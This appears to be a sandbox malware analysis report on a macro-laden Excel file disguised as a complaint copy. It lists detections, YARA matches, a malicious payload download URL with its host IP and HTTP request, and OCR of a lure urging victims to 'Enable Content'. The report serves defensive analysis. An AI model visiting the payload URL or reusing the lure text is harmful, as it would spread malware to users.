Loading ...

Play interactive tourEdit tour

Analysis Report Complaint-Copy_1984632811_11102020.xls

Overview

General Information

Sample Name:Complaint-Copy_1984632811_11102020.xls
Analysis ID:321328
MD5:3923517a84aa5cda58fec80a26dfbfac
SHA1:96339ae67e0634cabaefe3a9f13b0dd29f128781
SHA256:5958d4456b39343d02e0a90b156112ff2f42ab2f94fb453f722b8c4f1f91b1c4

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Found abnormal large hidden Excel 4.0 Macro sheet
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 2844 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Complaint-Copy_1984632811_11102020.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x780d:$e1: Enable Editing
  • 0x7858:$e1: Enable Editing
  • 0x7876:$e2: Enable Content
Complaint-Copy_1984632811_11102020.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x8ea2:$s1: Excel
  • 0x9f13:$s1: Excel
  • 0x374e:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
Complaint-Copy_1984632811_11102020.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Antivirus / Scanner detection for submitted sampleShow sources
    Source: Complaint-Copy_1984632811_11102020.xlsAvira: detected
    Antivirus detection for URL or domainShow sources
    Source: http://int.boogieapparel.co.id/jvkuykqpn/4574557.pngAvira URL Cloud: Label: malware
    Multi AV Scanner detection for submitted fileShow sources
    Source: Complaint-Copy_1984632811_11102020.xlsReversingLabs: Detection: 18%

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Source: global trafficDNS query: name: int.boogieapparel.co.id
    Source: global trafficTCP traffic: 192.168.2.3:49710 -> 103.253.212.59:80
    Source: global trafficTCP traffic: 192.168.2.3:49710 -> 103.253.212.59:80
    Source: global trafficHTTP traffic detected: GET /jvkuykqpn/4574557.png HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: int.boogieapparel.co.idConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /jvkuykqpn/4574557.png HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: int.boogieapparel.co.idConnection: Keep-Alive
    Source: unknownDNS traffic detected: queries for: int.boogieapparel.co.id
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://api.office.net
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://api.onedrive.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://augloop.office.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://autodiscover-s.outlook.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://cdn.entity.
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://cortana.ai
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://cr.office.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://directory.services.
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://graph.windows.net
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://graph.windows.net/
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://login.windows.local
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://management.azure.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://management.azure.com/
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://messaging.office.com/
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://ncus-000.contentsync.
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://officeapps.live.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://onedrive.live.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://outlook.office.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://outlook.office365.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://settings.outlook.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://tasks.office.com
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 514913CD-09DC-49EE-A35E-AC55604C79F5.0.drString found in binary or memory: https://www.odwebp.svc.ms

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing, please click 'Enable Content' from the yellow bar above O 0 WHY I CANNOT OPEN THI
    Source: Screenshot number: 4Screenshot OCR: Enable Content' from the yellow bar above O 0 WHY I CANNOT OPEN THIS DOCUMENT? Wyqu are using iO
    Source: Document image extraction number: 2Screenshot OCR: Enable Editing' from the yellow bar above Once You have Enable Editing, please click 'Enable Conte
    Source: Document image extraction number: 2Screenshot OCR: Enable Content' from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andr
    Source: Document image extraction number: 8Screenshot OCR: Enable Editing' from the yellow bar above @Once You have Enable Editing, please click 'Enable Cont
    Source: Document image extraction number: 8Screenshot OCR: Enable Content' from the yellow bar above WHYI CANNOT OPEN THIS DOCUMENT? wYou are using IDS or A
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: Complaint-Copy_1984632811_11102020.xlsInitial sample: Sheet size: 41496
    Source: Complaint-Copy_1984632811_11102020.xlsOLE indicator, VBA macros: true
    Source: Complaint-Copy_1984632811_11102020.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
    Source: Complaint-Copy_1984632811_11102020.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: classification engineClassification label: mal84.expl.evad.winXLS@1/6@1/1
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{C8E4271A-5827-4FEA-AF5E-8FE4A4D2AFB2} - OProcSessId.datJump to behavior
    Source: Complaint-Copy_1984632811_11102020.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: Complaint-Copy_1984632811_11102020.xlsReversingLabs: Detection: 18%
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
